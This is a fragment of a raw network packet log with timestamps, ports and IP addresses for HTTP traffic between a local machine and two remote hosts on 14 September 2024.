Sep 14, 2024 18:31:14.925002098 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.925034046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925066948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925096989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925121069 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.925174952 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.925193071 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925226927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925260067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925282001 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.925313950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925359011 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.925389051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925422907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925452948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925476074 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.925527096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925575972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925590038 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.925616980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925651073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925671101 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.925703049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925734997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925755978 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.925787926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925820112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925842047 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.925873041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925904989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925928116 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.925960064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.925992966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926014900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.926054955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926088095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926110029 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.926142931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926175117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926197052 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.926228046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926263094 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926284075 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.926314116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926346064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926367998 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.926398993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926431894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926454067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.926489115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926522017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926542997 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.926578045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926610947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926631927 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.926665068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926697969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926717997 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.926748991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926780939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926804066 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.926836014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926870108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926897049 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.926927090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926959991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.926980972 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.927017927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.927064896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.927079916 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.927113056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.927148104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.927170992 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.927203894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.927237034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.927257061 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.927288055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.927320957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.927340984 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.927373886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.927429914 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.927485943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.927520990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.927555084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.927577019 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.927608013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.927640915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.927674055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.927707911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.927742958 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.927763939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.927798033 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.927820921 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.927840948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.927875042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.927908897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.927931070 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.927964926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.928008080 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.970416069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.970464945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.970501900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.970551014 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.970586061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.970621109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.970649004 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.970681906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.970710993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.970733881 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.970766068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.970803022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.970829010 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.977355957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.977416992 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.977437019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.977495909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.977546930 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.977571964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.977624893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.977658987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.977680922 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.977730989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.977762938 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.977783918 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.977816105 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.977847099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.977869987 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.977902889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.977935076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.977955103 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.977988005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.978020906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.978041887 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.978071928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.978105068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.978123903 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.978159904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.978192091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.978210926 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.978243113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.978293896 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:16.073506117 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:16.078604937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:16.669313908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:16.670259953 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:16.675143957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:16.774032116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:16.774066925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:16.774102926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:16.774132967 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:16.774173021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:16.774231911 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:36.203526020 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.209136963 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.209237099 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.209316969 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.214220047 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.797843933 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.797943115 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.797977924 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.798015118 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.798017025 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.798049927 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.798078060 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.798088074 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.798139095 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.798139095 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.798173904 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.798206091 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.798232079 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.798240900 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.798290014 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.806401968 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.806576014 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.806644917 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.886533022 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.886567116 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.886603117 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.886634111 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.886682987 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.886717081 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.886730909 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.886751890 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.886785984 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.886799097 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.887752056 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.887787104 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.887820959 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.887824059 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.887852907 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.887876987 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.887888908 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.887940884 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.888598919 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.888629913 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.888664007 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.888695002 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.888710976 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.888734102 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.888748884 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.889486074 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.889518976 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.889566898 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.889662027 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.889695883 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.889715910 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.889729977 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.889822006 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.893294096 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.893326998 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.893384933 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.971800089 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.971831083 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.971853018 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.971893072 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.971930981 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.971966982 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.971976995 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.971982956 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.972026110 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.972033978 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.972048998 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.972064972 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.972099066 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.972795010 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.972848892 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.972863913 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.972868919 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.972882032 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.972907066 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.973320007 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.973335028 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.973360062 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.973371983 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.973372936 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.973392010 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.973407030 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.973414898 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.973455906 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.974436045 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.974503994 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.974637985 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.974653006 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.974668026 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.974683046 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.974698067 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.974700928 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.974715948 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.977063894 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.977080107 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.977087975 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.977102041 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.977118969 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.977143049 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.977152109 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.977211952 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.977227926 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.977243900 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.977258921 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.977266073 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.977266073 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.977276087 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.977292061 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.977296114 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.977323055 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.991260052 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.991286039 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.991300106 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.991313934 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.991349936 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:36.991369009 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.991559982 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.991575003 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:36.991609097 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.012923002 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.012974024 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.012978077 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.013010979 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.013062954 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.024812937 CEST	49737	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:37.024992943 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:37.060724974 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.060780048 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.060812950 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.060833931 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.060869932 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.060902119 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.060923100 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.060935974 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.060967922 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.060986042 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.061044931 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.061094999 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.061115980 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.061148882 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.061181068 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.061196089 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.061496019 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.061527967 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.061553001 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.061562061 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.061595917 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.061626911 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.061630011 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.061686039 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.061968088 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.062038898 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.062088013 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.062150955 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.062186956 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.062221050 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.062232971 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.062253952 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.062287092 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.062299967 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.062340021 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.062375069 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.062392950 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.062994957 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.063025951 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.063045979 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.063077927 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.063110113 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.063160896 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.063193083 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.063205957 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.063205957 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.063227892 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.063260078 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.063275099 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.063298941 CEST	80	49739	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:37.063349962 CEST	49739	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:37.063963890 CEST	80	49739	45.201.245.153	192.168.2.4
